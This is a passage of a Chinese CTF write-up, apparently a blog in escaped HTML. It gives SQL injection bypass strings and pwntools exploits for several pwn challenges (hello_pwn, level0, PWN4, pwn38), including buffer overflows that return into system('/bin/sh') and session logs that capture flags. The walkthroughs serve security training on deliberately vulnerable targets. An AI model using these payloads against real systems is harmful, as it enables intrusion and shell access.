            \u7b2c\u4e8c\u4e2a\u5355\u5f15\u53f7\uff0c\u4e0e\u67e5\u8be2\u65f6\u540e\u9762\u7684\u5355\u5f15\u53f7\u5f62\u6210\u95ed\u5408\uff1b<\/p>\n\n\n\n
            \u7b2c\u4e09\u548c\u7b2c\u56db\u4e2a\u5355\u5f15\u53f7\u5b9e\u9645\u4e0a\u53ea\u662f\u4f7f\u7b49\u53f7\u6210\u7acb\u7684\u5185\u5bb9\uff0c\u5373’=’<\/p>\n\n\n\n
            \u6211\u4eec\u77e5\u9053or\u7684\u4e24\u8fb9\u53ea\u8981\u6709\u4e00\u8fb9\u6210\u7acb\uff0c\u7ed3\u679c\u5c31\u4e3a\u771f\uff0c\u800c \u5355\u5f15\u53f7\uff1d\u5355\u5f15\u53f7 \u8fd9\u4e2a\u80af\u5b9a\u662f\u6052\u6210\u7acb\u7684<\/p>\n\n\n\n
            \u7c7b\u4f3c\u7684<\/p>\n\n\n\n
            \u8fd8\u6709<\/p>\n\n\n\n
            \/?id=' or '1=1<\/pre>\n\n\n\n
            \u4ee5\u53ca<\/p>\n\n\n\n
            \/?id=' or 1=1 -- +<\/pre>\n\n\n\n
            \u8fd9\u4fe9\u90fd\u53ef\u4ee5\u505a\u5230\u8fd9\u4e00\u6548\u679c<\/p>\n\n\n\n
            \u62ff\u5230\u56de\u663eflag<\/p>\n\n\n\n
            hello_pwn<\/h1>\n\n\n\n
            \u5148checksec\u770b\u770b\u60c5\u51b5<\/p>\n\n\n\n
                Arch:       amd64-64-little
                RELRO:      Partial RELRO
                Stack:      No canary found
                NX:         NX enabled
                PIE:        No PIE (0x400000)<\/pre>\n\n\n\n
            \u770b\u4e0d\u61c2\uff0c\u53cd\u6b6364\u4f4d<\/p>\n\n\n\n
            \u8fdbIDA64<\/p>\n\n\n\n
            \u5148\u770bmain\u51fd\u6570<\/p>\n\n\n\n
            F5\u770b\u770b\u5148<\/p>\n\n\n\n
            \"\"<\/div><\/figure>\n\n\n\n
            read\u51fd\u6570\u8bfb\u5185\u5bb9<\/p>\n\n\n\n
            \u4eceunk_601068\u5f00\u59cb\u8bfb<\/p>\n\n\n\n
            \u90a3\u4e48\u5c31\u53bb\u627eunk_601068\u7684\u5177\u4f53\u5730\u5740<\/p>\n\n\n\n
            \"\"<\/div><\/figure>\n\n\n\n
            \u627e\u5230<\/p>\n\n\n\n
            db\u662f1\u5b57\u8282\uff0cdd\u662f4\u5b57\u8282<\/p>\n\n\n\n
            \u800cdword_60106c\u7b49\u4e8e1853186401\u5c31\u80fd\u8fdb\u5165sub_400686\u51fd\u6570<\/p>\n\n\n\n
            \u800csub_400686\u53c8\u80fd<\/p>\n\n\n\n
            \"\"<\/div><\/figure>\n\n\n\n
            \u6240\u4ee5\u8f6c\u5230sub_400686\u51fd\u6570\u662f\u5fc5\u987b\u7684<\/p>\n\n\n\n
            \u8865\u5145read\u51fd\u6570\u7684\u6548\u679c\uff1a<\/p>\n\n\n\n
            \u5728\u8fd9\u6bb5\u4ee3\u7801\u4e2d\uff0cread<\/code> \u51fd\u6570\u7684\u8c03\u7528\u5982\u4e0b\uff1a<\/p>\n\n\n\n
            read(0, &unk_601068, 0x10uLL);<\/pre>\n\n\n\n
            read<\/code> \u51fd\u6570\u7684\u539f\u578b\u662f ssize_t read(int fd, void *buf, size_t count);<\/code>\uff0c\u5176\u4e2d\uff1a<\/p>\n\n\n\n
              \n
            • fd<\/code> \u662f\u6587\u4ef6\u63cf\u8ff0\u7b26\uff0c\u8fd9\u91cc\u662f 0<\/code>\uff0c\u4ee3\u8868\u6807\u51c6\u8f93\u5165\uff08stdin\uff09\u3002<\/li>\n\n\n\n
            • buf<\/code> \u662f\u6307\u5411\u7f13\u51b2\u533a\u7684\u6307\u9488\uff0c\u8fd9\u91cc\u662f &unk_601068<\/code>\uff0c\u8868\u793a\u8bfb\u5165\u7684\u6570\u636e\u5c06\u88ab\u5b58\u50a8\u5728 unk_601068<\/code> \u53d8\u91cf\u6240\u5728\u7684\u5730\u5740\u3002<\/li>\n\n\n\n
            • count<\/code> \u662f\u8981\u8bfb\u53d6\u7684\u5b57\u8282\u6570\uff0c\u8fd9\u91cc\u662f 0x10uLL<\/code>\uff0c\u537316\u5b57\u8282\u3002<\/li>\n<\/ul>\n\n\n\n
              \u56e0\u6b64\uff0c\u8fd9\u4e2a read<\/code> \u51fd\u6570\u8c03\u7528\u4f1a\u5c1d\u8bd5\u4ece\u6807\u51c6\u8f93\u5165\u8bfb\u53d616\u5b57\u8282\u7684\u6570\u636e\u3002\u5982\u679c\u8f93\u5165\u7684\u6570\u636e\u5c11\u4e8e16\u5b57\u8282\uff0cread<\/code> \u51fd\u6570\u4f1a\u8fd4\u56de\u5b9e\u9645\u8bfb\u53d6\u7684\u5b57\u8282\u6570\uff0c\u4f46\u4e0d\u4f1a\u963b\u585e\u7b49\u5f85\u66f4\u591a\u7684\u8f93\u5165\uff0c\u9664\u975e\u6807\u51c6\u8f93\u5165\u88ab\u7ba1\u9053\u6216\u7ec8\u7aef\u63a7\u5236\u53f0\u9650\u5236\u3002\u5982\u679c\u8f93\u5165\u7684\u6570\u636e\u591a\u4e8e16\u5b57\u8282\uff0cread<\/code> \u51fd\u6570\u53ea\u4f1a\u8bfb\u53d6\u524d16\u5b57\u8282\u3002<\/p>\n\n\n\n
              \u8fd9\u91cc\u76f4\u63a5\u8f93\u5165<\/p>\n\n\n\n
              aaaa1853186401<\/pre>\n\n\n\n
              \u662f\u6ca1\u7528\u7684<\/p>\n\n\n\n
              \u6211\u7684\u7406\u89e3\u662f\u6ca1\u6709\u7ecf\u8fc7\u7f16\u7801\u5bfc\u81f4\u8bc6\u522b\u7684\u5185\u5bb9\u4e0d\u662fbyte\u800c\u662f\u5b57\u7b26\u4e32<\/p>\n\n\n\n
              \u5982\u679c\u6b63\u786e\u7f16\u7801\u8fc7\u540e\u7684\u6548\u679c\u662f<\/p>\n\n\n\n
              aaaaaaun\\x00\\x00\\x00\\x00<\/pre>\n\n\n\n
              \u8fd9\u4e2a\u76f4\u63a5cmd\u8fdenc\u5c31\u80fd\u62ff\u5230flag<\/p>\n\n\n\n
              \u7ecf\u8fc7\u6d4b\u8bd5<\/p>\n\n\n\n
              \u76f4\u63a5<\/p>\n\n\n\n
              aaaaaaun<\/pre>\n\n\n\n
              \u4e5f\u80fd\u62ff\u5230flag<\/p>\n\n\n\n
              \u501f\u9274\u5927\u4f6c\u535a\u5ba2<\/p>\n\n\n\n
              1853186401\u8f6c\u5316\u4e3a\u5b57\u6bcd\u5c31\u662fnuaa\uff0c\u4e5f\u5c31\u662f\u8f93\u5165aaaanuaa<\/p>\n\n\n\n
              \u4f46\u56e0\u4e3a\u5b58\u5728\u5c0f\u7aef\u5e8f\u548c\u5927\u7aef\u5e8f\u7684\u95ee\u9898\uff0c\u672c\u9898\u91c7\u7528\u7684\u662f\u5c0f\u7aef\u5e8f<\/p>\n\n\n\n
              \u56e0\u6b64\u672c\u9898\u7684\u8f93\u5165\u5e94\u8be5\u4e3a\uff0c<\/p>\n\n\n\n
              aaaaaaun<\/pre>\n\n\n\n
              \u5982\u679c\u6784\u9020exp<\/p>\n\n\n\n
              \u5c31\u662f<\/p>\n\n\n\n
              from pwn import *
              p=remote(\"61.147.171.105\",57506)
              payload=('a'*4).encode()+p64(1853186401)
              p.sendline(payload)
              p.interactive()<\/pre>\n\n\n\n
              encode\u548cp64\u65b9\u6cd5\u662f\u5fc5\u987b\u7684<\/p>\n\n\n\n
              \u7ecf\u8fc7\u8fd9\u6837\u7684\u7f16\u7801\u624d\u80fd\u5b58\u5165\u5bf9\u5e94\u5b57\u8282\u62ff\u5230flag<\/p>\n\n\n\n
              \u8fd8\u6709\u4e00\u79cdpayload\u662f<\/p>\n\n\n\n
              payload=p32(1853186401)*2<\/pre>\n\n\n\n
              \u7406\u89e3\u5f97\u5230\u7ed3\u8bba<\/p>\n\n\n\n
              \u524d\u4e00\u79cdpayload\u662f\u6700\u53ef\u80fd\u76f4\u63a5\u60f3\u5230\u7684<\/p>\n\n\n\n
              \u56e0\u4e3aunk_601068\u5230dword_60106c\u4e4b\u95f4\u5dee4\u4e2adb\uff0c\u4e5f\u5c31\u662f\u56db\u4e2a\u5b57\u8282\uff0c\u4e8e\u662f\u81ea\u884c\u8865\u5145\u4e864\u5b57\u8282\u7684\u2019aaaa\u2018<\/p>\n\n\n\n
              \u7136\u540e\u7531\u4e8e\u662f64\u4f4d\u7684\u7a0b\u5e8f<\/p>\n\n\n\n
              \u4e8e\u662fp64\uff08\uff09<\/p>\n\n\n\n
              \u7406\u8bba\u4e0a\u6765\u8bf4\uff1a<\/p>\n\n\n\n
                \n
              1. 32\u4f4d\u7a0b\u5e8f<\/strong>\uff1a\u5982\u679c\u4f60\u7684\u76ee\u6807\u7a0b\u5e8f\u662f32\u4f4d\u7684\uff0c\u90a3\u4e48\u4f60\u5e94\u8be5\u4f7f\u7528 p32<\/code> \u51fd\u6570\u6765\u7f16\u7801\u6574\u6570\u3002\u8fd9\u5c06\u786e\u4fdd\u6574\u6570\u4ee532\u4f4d\u5c0f\u7aef\u683c\u5f0f\u5b58\u50a8\uff0c\u8fd9\u662f32\u4f4d\u7cfb\u7edf\u7684\u6807\u51c6\u3002<\/li>\n\n\n\n
              2. 64\u4f4d\u7a0b\u5e8f<\/strong>\uff1a\u5982\u679c\u4f60\u7684\u76ee\u6807\u7a0b\u5e8f\u662f64\u4f4d\u7684\uff0c\u90a3\u4e48\u4f60\u5e94\u8be5\u4f7f\u7528 p64<\/code> \u51fd\u6570\u6765\u7f16\u7801\u6574\u6570\u3002\u8fd9\u5c06\u786e\u4fdd\u6574\u6570\u4ee564\u4f4d\u5c0f\u7aef\u683c\u5f0f\u5b58\u50a8\uff0c\u8fd9\u662f64\u4f4d\u7cfb\u7edf\u7684\u6807\u51c6\u3002<\/li>\n\n\n\n
              3. 16\u4f4d\u7a0b\u5e8f<\/strong>\uff1a\u867d\u7136\u5728\u73b0\u4ee3\u7cfb\u7edf\u4e2d\u4e0d\u5e38\u89c1\uff0c\u4f46\u5982\u679c\u4f60\u7684\u76ee\u6807\u7a0b\u5e8f\u662f16\u4f4d\u7684\uff0c\u4f60\u53ef\u80fd\u9700\u8981\u4f7f\u7528 p16<\/code> \u51fd\u6570\u6765\u7f16\u7801\u6574\u6570\uff0c\u5c3d\u7ba1 pwntools<\/code> \u53ef\u80fd\u4e0d\u76f4\u63a5\u63d0\u4f9b\u8fd9\u6837\u7684\u51fd\u6570\uff0c\u4f60\u53ef\u4ee5\u901a\u8fc7\u5176\u4ed6\u65b9\u5f0f\u6765\u5b9e\u73b016\u4f4d\u7684\u7f16\u7801\u3002<\/li>\n<\/ol>\n\n\n\n
                \u4f46\u53d1\u73b0\u7684\u77db\u76fe\u5728\u4e8e\uff0c\u660e\u660edd\u662f4\u5b57\u8282\uff0c\u4f46p64\u7684\u7ed3\u679c\u4f1a\u662f8\u5b57\u8282<\/p>\n\n\n\n
                \u4f46\u662fpayload\u5199p64\u4e5f\u80fd\u51faflag<\/p>\n\n\n\n
                \u5f88\u5947\u602a<\/p>\n\n\n\n
                \u53d1\u73b0\u8fd9\u4e00\u70b9\uff0c\u5c31\u53bb\u770bp32\uff08\uff09\u65b9\u6cd5<\/p>\n\n\n\n
                \u53d1\u73b0\u65b0\u7684payload<\/p>\n\n\n\n
                payload=('a'*4).encode()+p32(1853186401)<\/pre>\n\n\n\n
                \u4f46\u662f\u5185\u5bb9\u771f\u7684\u6709\u533a\u522b\u5417\uff1f<\/p>\n\n\n\n
                \u76f4\u63a5\u5355\u72ec\u770bp64\u548cp32\u7684\u6548\u679c\u597d\u4e86<\/p>\n\n\n\n
                b'aaun'
                b'aaun\\x00\\x00\\x00\\x00'<\/pre>\n\n\n\n
                \u8fd9\u5c31\u662fprint\u5f97\u5230\u7684p32\u548cp64\u7684\u6548\u679c<\/p>\n\n\n\n
                \\x00\u662f\u7a7a<\/p>\n\n\n\n
                \u4e5f\u5c31\u662f\u8bf4\\x00\u662f\u540e\u9762\u56e0\u4e3a\u4f4d\u6570\u4e0d\u8db3\u8865\u5168\u7684\uff0c\u6240\u4ee5\u8fd9\u91ccp32\u4e5f\u80fd\u76f4\u63a5\u51fa<\/p>\n\n\n\n
                \u90a3\u4e3a\u4ec0\u4e48\u8fd9\u79cdpayload\u5f97\u8fd9\u6837\uff1f<\/p>\n\n\n\n
                payload=p32(1853186401)*2<\/pre>\n\n\n\n
                \u539f\u7406\u4e5f\u5f88\u660e\u663e\u4e86<\/p>\n\n\n\n
                p32\u89e3\u6784\u51fa\u6765\u7684\u5185\u5bb9\u5c314\u5b57\u8282<\/p>\n\n\n\n
                \u800c\u4eceunk_601068\u5230dword_60106c\u4e4b\u95f4\u5dee4\u4e2adb\uff0c\u4e5f\u5c31\u662f\u56db\u4e2a\u5b57\u8282\uff0c\u7136\u540edword_60106c\u672c\u8eab\u53c8\u6709dd\u8fd9\u4e2a4\u5b57\u8282<\/p>\n\n\n\n
                \u6240\u4ee5payload\u5f97p32\u540e*2<\/p>\n\n\n\n
                \u6784\u6210\u4e00\u4e2a8\u5b57\u8282\u957f\u5ea6\u7684\u5185\u5bb9\u8986\u76d6\u4e0a\u53bb<\/p>\n\n\n\n
                \u6700\u540e\u624d\u80fd\u62ff\u5230flag<\/p>\n\n\n\n
                level0<\/strong><\/em><\/h1>\n\n\n\n
                \u62ff\u5230\u9644\u4ef6<\/p>\n\n\n\n
                \u5148checksec<\/p>\n\n\n\n
                    Arch:       amd64-64-little
                    RELRO:      No RELRO
                    Stack:      No canary found
                    NX:         NX enabled
                    PIE:        No PIE (0x400000)
                    Stripped:   No<\/pre>\n\n\n\n
                \u5c31IDA64<\/p>\n\n\n\n
                \u8fde\u4e0a<\/p>\n\n\n\n
                \u770bmain\u51fd\u6570<\/p>\n\n\n\n
                int __cdecl main(int argc, const char **argv, const char **envp)
                {
                  write(1, \"Hello, World\\n\", 0xDuLL);
                  return vulnerable_function();
                \u200b
                }<\/pre>\n\n\n\n
                \u5e73\u5e73\u65e0\u5947<\/p>\n\n\n\n
                \u6709\u4e2aruturn\u7684\u51fd\u6570<\/p>\n\n\n\n
                return\u662f\u65b9\u6cd5\uff0c\u5b9e\u9645\u51fd\u6570\u662fvulnerable_function()<\/p>\n\n\n\n
                \u53cc\u51fb\u51fd\u6570<\/p>\n\n\n\n
                ssize_t vulnerable_function()
                {
                  char buf; \/\/ [rsp+0h] [rbp-80h]
                \u200b
                  return read(0, &buf, 0x200uLL);
                }<\/pre>\n\n\n\n
                \u4e00\u4e2a\u80fd\u8bfb200\u5b57\u8282\u7684read\u51fd\u6570<\/p>\n\n\n\n
                buf\u4ece[rsp+0h] \u5230[rbp-80h]<\/p>\n\n\n\n
                \u53cc\u51fbbuf\u5c31\u53ef\u4ee5\u770b\u5230\u786e\u5b9ebuf\u7f13\u51b2\u533a\u662f\u4ece[rsp+0h] \u5230[rbp-80h]<\/p>\n\n\n\n
                \u6bcf\u4e2a\u5730\u5740\u4e00\u5b57\u8282<\/p>\n\n\n\n
                \"\"<\/div><\/figure>\n\n\n\n
                \u5230\u672b\u5c3e\u51fa\u73b0\u4e86\u4e00\u4e2as\u548c\u4e00\u4e2ar<\/p>\n\n\n\n
                s\u662fstart\u6216\u8005stop<\/p>\n\n\n\n
                r\u4ee3\u8868read\u51fd\u6570<\/p>\n\n\n\n
                \u800cbuf\u7f13\u51b2\u533a\u662f\u8bfb\u53d6\u7684\u5f00\u59cb<\/p>\n\n\n\n
                \u5c31\u662f[rsp+0h] \u5230[rbp-80h]<\/p>\n\n\n\n
                \u4f46\u5149\u8fd9\u4e9b\u4fe1\u606f\u5e76\u4e0d\u80fd\u5e2e\u52a9\u6211\u4eec\u62ff\u5230flag<\/p>\n\n\n\n
                \u4e0a\u4e00\u9898\u6709\u76f4\u63a5\u8fdb\u5165\u4e00\u4e2a\u51fd\u6570\uff0c\u51fd\u6570\u5c31\u4f1a\u76f4\u63a5cat flag<\/p>\n\n\n\n
                \u8fd9\u9898\u8fd8\u6ca1\u6709\u770b\u5230\u8fd9\u79cd\u6548\u679c<\/p>\n\n\n\n
                \u4e8e\u662f\u5f00\u59cb\u627e\u63d0\u6743\u51fd\u6570<\/p>\n\n\n\n
                \"\"<\/div><\/figure>\n\n\n\n
                \u5b9e\u9645\u4e0a\u518dHello,World\u4e4b\u4e0a\u5c31\u6709\u4e00\u4e2a\u63d0\u53d6<\/p>\n\n\n\n
                \u53cc\u51fb\u5206\u53f7\u540e\u9762\u7684\u90e8\u5206<\/p>\n\n\n\n
                \u8fdb\u5165\u8fd9\u4e2a\u63d0\u53d6\u51fd\u6570<\/p>\n\n\n\n
                \u51fd\u6570\u5185\u5bb9\uff1a<\/p>\n\n\n\n
                int callsystem()
                {
                  return system(\"\/bin\/sh\");
                }<\/pre>\n\n\n\n
                \u76ee\u7684\u5f88\u660e\u663e\u4e86<\/p>\n\n\n\n
                \u8981\u8fdb\u5165\u8fd9\u4e2acallsystem()\u51fd\u6570<\/p>\n\n\n\n
                \u53bbexport\u7a97\u53e3\u770b\u8fd9\u4e2a\u51fd\u6570\u7684\u5b9e\u9645\u5730\u5740<\/p>\n\n\n\n
                \"\"<\/div><\/figure>\n\n\n\n
                \u770b\u5230\u5730\u5740\u4e3a00400596<\/p>\n\n\n\n
                \u90a3\u4e48payload\u5c31\u5f88\u597d\u6784\u9020\u4e86<\/p>\n\n\n\n
                payload=('a'*0x80).encode()+p64(0x00400596)<\/pre>\n\n\n\n
                \u5730\u5740\u90fd\u4fdd\u7559\u540e\u516b\u4f4d\u5373\u53ef<\/p>\n\n\n\n
                \u7136\u540e\u642d\u914d0x\u5373\u53ef<\/p>\n\n\n\n
                \u53ef\u662fcat flag\u548cls\u90fd\u6ca1\u53cd\u5e94<\/p>\n\n\n\n
                \u5012\u56de\u53bb\u770b\u5730\u5740\u56fe<\/p>\n\n\n\n
                s\u548cr\u4e4b\u95f4\u5dee\u4e868\u4e2a\u5730\u5740<\/p>\n\n\n\n
                \u4e00\u4e2a\u662f\u51680000000000000000<\/p>\n\n\n\n
                \u4e00\u4e2a\u662f0000000000000008<\/p>\n\n\n\n
                \u6240\u4ee5payload\u9700\u8981\u66f4\u6539<\/p>\n\n\n\n
                payload=('a'*0x88).encode()+p64(0x00400596)<\/pre>\n\n\n\n
                \u8fd9\u6837\u518d\u53bb\u8fd0\u884c<\/p>\n\n\n\n
                \u8fd0\u884c\u7ed3\u679c<\/p>\n\n\n\n
                [x] Opening connection to 61.147.171.105 on port 53438
                [x] Opening connection to 61.147.171.105 on port 53438: Trying 61.147.171.105
                [+] Opening connection to 61.147.171.105 on port 53438: Done
                [*] Switching to interactive mode
                Hello, World
                ls
                bin
                dev
                flag
                level0
                lib
                lib32
                lib64
                cat flag
                cyberpeace{d74ac0bd57b66dbd123593f0186ccd81}<\/pre>\n\n\n\n
                \u8fd9\u4e2apayload\u7684\u672c\u8d28\u6211\u8ba4\u4e3a\u5c31\u662f\u5148\u586b\u5145\u6ee1\u6574\u4e2abuf\u7f13\u51b2\u533a<\/p>\n\n\n\n
                \u7136\u540e\u518d\u5c06callsystem\u51fd\u6570\u7684\u5730\u5740\u62fc\u63a5\u5728payload\u540e\u9762<\/p>\n\n\n\n
                \u4f7f\u5f97read\u51fd\u6570\u8bfb\u5230callsystem\u51fd\u6570<\/p>\n\n\n\n
                \u7136\u540e\u6267\u884c\u8fd9\u4e2a\u51fd\u6570<\/p>\n\n\n\n
                \u7136\u540e\u8ba9\u653b\u51fb\u8005\u62ff\u5230\/bin\/sh\u6743\u9650<\/p>\n\n\n\n
                PWN4<\/strong><\/em><\/h1>\n\n\n\n
                checksec<\/p>\n\n\n\n
                Arch:       amd64-64-little
                RELRO:      Full RELRO
                Stack:      Canary found
                NX:         NX enabled
                PIE:        PIE enabled
                Stripped:   No<\/pre>\n\n\n\n
                \u7528IDA64<\/p>\n\n\n\n
                \u770bmain<\/p>\n\n\n\n
                int __cdecl main(int argc, const char **argv, const char **envp)
                {
                  char s1[8]; \/\/ [rsp+1h] [rbp-1Fh]
                  char s2; \/\/ [rsp+Ch] [rbp-14h]
                  unsigned __int64 v6; \/\/ [rsp+18h] [rbp-8h]
                \u200b
                  v6 = __readfsqword(0x28u);
                  setvbuf(_bss_start, 0LL, 2, 0LL);
                  setvbuf(stdin, 0LL, 2, 0LL);
                  strcpy(s1, \"CTFshowPWN\");
                  logo();
                  puts(\"find the secret !\");
                  __isoc99_scanf(\"%s\", &s2);
                  if ( !strcmp(s1, &s2) )
                    execve_func();
                  return 0;
                }<\/pre>\n\n\n\n
                \u4ee3\u7801\u7684\u9010\u884c\u89e3\u91ca\uff1a<\/p>\n\n\n\n
                  \n
                1. int __cdecl main(int argc, const char **argv, const char **envp)<\/code>\uff1a\u8fd9\u662f\u7a0b\u5e8f\u7684\u4e3b\u51fd\u6570\u5165\u53e3\u70b9\uff0c__cdecl<\/code>\u662f\u8c03\u7528\u7ea6\u5b9a\uff0cmain<\/code>\u51fd\u6570\u63a5\u53d7\u4e09\u4e2a\u53c2\u6570\uff1aargc<\/code>\uff08\u53c2\u6570\u4e2a\u6570\uff09\uff0cargv<\/code>\uff08\u53c2\u6570\u6570\u7ec4\uff09\uff0cenvp<\/code>\uff08\u73af\u5883\u53d8\u91cf\u6570\u7ec4\uff09\u3002<\/li>\n\n\n\n
                2. char s1[8];<\/code>\uff1a\u58f0\u660e\u4e00\u4e2a\u5b57\u7b26\u6570\u7ec4s1<\/code>\uff0c\u957f\u5ea6\u4e3a8\u4e2a\u5b57\u7b26\u3002<\/li>\n\n\n\n
                3. char s2;<\/code>\uff1a\u58f0\u660e\u4e00\u4e2a\u5b57\u7b26\u53d8\u91cfs2<\/code>\u3002<\/li>\n\n\n\n
                4. unsigned __int64 v6;<\/code>\uff1a\u58f0\u660e\u4e00\u4e2a\u65e0\u7b26\u53f764\u4f4d\u6574\u6570v6<\/code>\u3002<\/li>\n\n\n\n
                5. v6 = __readfsqword(0x28u);<\/code>\uff1a\u8fd9\u884c\u4ee3\u7801\u8bfb\u53d6\u4e86FS\u6bb5\u5bc4\u5b58\u5668\u4e2d\u7684\u4e00\u4e2a\u503c\uff08\u901a\u5e38\u662f\u7528\u4e8e\u5b89\u5168\u68c0\u67e5\u7684Canary\u503c\uff09\uff0c\u5e76\u5c06\u5176\u5b58\u50a8\u5728v6<\/code>\u4e2d\u3002<\/li>\n\n\n\n
                6. setvbuf(_bss_start, 0LL, 2, 0LL);<\/code>\uff1a\u8bbe\u7f6e_bss_start<\/code>\u6d41\u7684\u7f13\u51b2\u533a\uff0c\u4f7f\u5176\u4e0d\u4f7f\u7528\u7f13\u51b2\u533a\uff08\u65e0\u7f13\u51b2\uff09\uff0c2<\/code>\u8868\u793a\u4e0d\u7f13\u51b2\uff0c0LL<\/code>\u8868\u793a\u7f13\u51b2\u533a\u5927\u5c0f\u4e3a0\u3002<\/li>\n\n\n\n
                7. setvbuf(stdin, 0LL, 2, 0LL);<\/code>\uff1a\u5bf9\u6807\u51c6\u8f93\u5165\u6d41stdin<\/code>\u505a\u540c\u6837\u7684\u8bbe\u7f6e\uff0c\u4f7f\u5176\u4e0d\u4f7f\u7528\u7f13\u51b2\u533a\u3002<\/li>\n\n\n\n
                8. strcpy(s1, \"CTFshowPWN\");<\/code>\uff1a\u5c06\u5b57\u7b26\u4e32”CTFshowPWN”\u590d\u5236\u5230s1<\/code>\u6570\u7ec4\u4e2d\u3002<\/li>\n\n\n\n
                9. logo();<\/code>\uff1a\u8c03\u7528logo<\/code>\u51fd\u6570\uff0c\u8fd9\u4e2a\u51fd\u6570\u53ef\u80fd\u7528\u6765\u663e\u793a\u7a0b\u5e8f\u7684logo\u6216\u8005\u6b22\u8fce\u4fe1\u606f\u3002<\/li>\n\n\n\n
                10. puts(\"find the secret !\");<\/code>\uff1a\u8f93\u51fa\u5b57\u7b26\u4e32”find the secret !”\u5230\u6807\u51c6\u8f93\u51fa\u3002<\/li>\n\n\n\n
                11. __isoc99_scanf(\"%s\", &s2);<\/code>\uff1a\u4f7f\u7528scanf<\/code>\u51fd\u6570\u7684ISO C99\u6807\u51c6\u7248\u672c\u8bfb\u53d6\u4e00\u4e2a\u5b57\u7b26\u4e32\u5230s2<\/code>\u53d8\u91cf\u4e2d\u3002<\/li>\n\n\n\n
                12. if ( !strcmp(s1, &s2) )<\/code>\uff1a\u68c0\u67e5s1<\/code>\u548cs2<\/code>\u6307\u5411\u7684\u5b57\u7b26\u4e32\u662f\u5426\u76f8\u7b49\uff0cstrcmp<\/code>\u51fd\u6570\u8fd4\u56de0\u8868\u793a\u4e24\u4e2a\u5b57\u7b26\u4e32\u76f8\u7b49\u3002<\/li>\n\n\n\n
                13. execve_func();<\/code>\uff1a\u5982\u679cs1<\/code>\u548cs2<\/code>\u76f8\u7b49\uff0c\u8c03\u7528execve_func<\/code>\u51fd\u6570\uff0c\u8fd9\u4e2a\u51fd\u6570\u53ef\u80fd\u662f\u7528\u6765\u6267\u884c\u67d0\u4e9b\u7279\u5b9a\u7684\u7cfb\u7edf\u8c03\u7528\u6216\u8005\u547d\u4ee4\u3002<\/li>\n\n\n\n
                14. return 0;<\/code>\uff1a\u7a0b\u5e8f\u6b63\u5e38\u9000\u51fa\uff0c\u8fd4\u56de\u503c0\u3002<\/li>\n<\/ol>\n\n\n\n
                  \u6574\u4f53\u6765\u770b\uff0c\u8fd9\u4e2a\u7a0b\u5e8f\u8981\u6c42\u7528\u6237\u8f93\u5165\u4e00\u4e2a\u5b57\u7b26\u4e32\uff0c\u5982\u679c\u8f93\u5165\u7684\u5b57\u7b26\u4e32\u4e0e”CTFshowPWN”\u76f8\u7b49\uff0c\u5c31\u4f1a\u8c03\u7528execve_func<\/code>\u51fd\u6570\u3002<\/p>\n\n\n\n
                  \u800cexecve_func<\/code>\u51fd\u6570\u53c8\u6709\u4ec0\u4e48\u529f\u80fd\uff1f<\/p>\n\n\n\n
                  unsigned __int64 execve_func()
                  {
                    char *argv; \/\/ [rsp+0h] [rbp-20h]
                    __int64 v2; \/\/ [rsp+8h] [rbp-18h]
                    __int64 v3; \/\/ [rsp+10h] [rbp-10h]
                    unsigned __int64 v4; \/\/ [rsp+18h] [rbp-8h]
                  \u200b
                    v4 = __readfsqword(0x28u);
                    argv = \"\/bin\/sh\";
                    v2 = 0LL;
                    v3 = 0LL;
                    execve(\"\/bin\/sh\", &argv, 0LL);
                    return __readfsqword(0x28u) ^ v4;
                  }<\/pre>\n\n\n\n
                  \u6548\u679c\u662f\u62ff\u5230\u201c\/bin\/sh\u201d<\/p>\n\n\n\n
                  \u601d\u8def\u6709\u4e86\uff0cpayload\u5c31\u662f\u7528\u6839\u636eif ( !strcmp(s1, &s2) )<\/code>\uff1a\u68c0\u67e5s1<\/code>\u548cs2<\/code>\u6307\u5411\u7684\u5b57\u7b26\u4e32\u662f\u5426\u76f8\u7b49\uff0cstrcmp<\/code>\u51fd\u6570\u8fd4\u56de0\u8868\u793a\u4e24\u4e2a\u5b57\u7b26\u4e32\u76f8\u7b49\uff0cs1\u662fCTFshowPWN<\/p>\n\n\n\n
                  \u90a3\u4e48\u8f93\u5165\u7684\u503cs2\u4e5f\u8be5\u662fCTFshowPWN<\/p>\n\n\n\n
                  \u51faflag\u7684\u65b9\u6cd5\u5f88\u591a\uff0cexp\u4e5f\u53ef\uff0ccmd\u91ccnc\u8fde\u4e0a\u8f93\u5165CTFshowPWN\u4e5f\u53ef<\/p>\n\n\n\n
                  exp\uff1a<\/p>\n\n\n\n
                  from pwn import *
                  sh=remote('pwn.challenge.ctf.show',28259)
                  payload=(b'CTFshowPWN')
                  sh.sendlineafter(b'find the secret !',payload)
                  sh.interactive()<\/pre>\n\n\n\n
                  \u54cd\u5e94\uff1a<\/p>\n\n\n\n
                  [x] Opening connection to pwn.challenge.ctf.show on port 28259
                  [x] Opening connection to pwn.challenge.ctf.show on port 28259: Trying 124.223.158.81
                  [+] Opening connection to pwn.challenge.ctf.show on port 28259: Done
                  [*] Switching to interactive mode
                  \u200b
                  ls
                  bin
                  boot
                  ctfshow_flag
                  dev
                  etc
                  home
                  lib
                  lib32
                  lib64
                  media
                  mnt
                  opt
                  proc
                  pwn
                  root
                  run
                  sbin
                  srv
                  start.sh
                  sys
                  tmp
                  usr
                  var
                  cat ctfshow_flag
                  ctfshow{a91d1d70-e6c1-46fd-913c-f9795e068767}<\/pre>\n\n\n\n
                  pwn38<\/h1>\n\n\n\n
                  from pwn import *
                  sh=remote('pwn.challenge.ctf.show',28248)
                  payload=b'a'*(0xA+8)+p64(0x40065B)+p64(0x400657)
                  sh.sendline(payload)
                  sh.interactive()<\/pre>\n\n\n\n
                  0xA\u662f\u5341\u5b57\u8282\u5185\u5bb9<\/p>\n\n\n\n
                  \u7531<\/p>\n\n\n\n
                  \"\"<\/div><\/figure>\n\n\n\n
                  [rsp+6h] [rbp-Ah]<\/p>\n\n\n\n
                    \n
                  • [rsp+6h]<\/code> \u8868\u793a buf<\/code> \u4ece\u6808\u6307\u9488\uff08rsp<\/code>\uff09\u5f00\u59cb\u5411\u540e\u504f\u79fb6\u4e2a\u5b57\u8282\uff086h<\/code>\u662f\u5341\u516d\u8fdb\u5236\u8868\u793a\uff0c\u7b49\u4e8e\u5341\u8fdb\u5236\u76846\uff09\u3002<\/li>\n\n\n\n
